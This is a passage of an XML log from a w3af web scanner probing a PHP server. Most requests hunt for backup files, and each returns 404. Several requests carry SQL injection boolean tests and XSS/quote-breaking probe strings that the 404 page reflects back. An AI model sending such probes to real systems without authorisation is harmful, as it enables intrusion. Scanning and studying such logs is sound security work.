                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="350">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="350">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="351">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="351">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="352">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="352">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="353">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="353">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="354">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="354">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="356">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="356">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="554" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="358">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="358">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="359">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="359">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="360">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="360">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="361">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96%22+OR+%2296%22%3D%2296 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="361">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96%22+OR+%2296%22%3D%2296 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96%22+OR+%2296%22%3D%2296'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="362">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/mgwha%3C%2F-%3Emgwha%2F%2Amgwha%22mgwhamgwha%27mgwhamgwha%60mgwhamgwha+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="362">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about mgwha%3C%2F-%3Emgwha%2F%2Amgwha%22mgwhamgwha%27mgwhamgwha%60mgwhamgwha+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='mgwha%3C%2F-%3Emgwha%2F%2Amgwha%22mgwhamgwha%27mgwhamgwha%60mgwhamgwha+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="364">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="364">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="365">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="365">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="366">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="366">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="368">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="368">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="371">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96%22+AND+%2296%22%3D%2297 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="371">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96%22+AND+%2296%22%3D%2297 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96%22+AND+%2296%22%3D%2297'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="374">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="374">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="375">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="375">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="376">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="376">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="383">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="383">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="388">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/d%27z%270 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="388">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
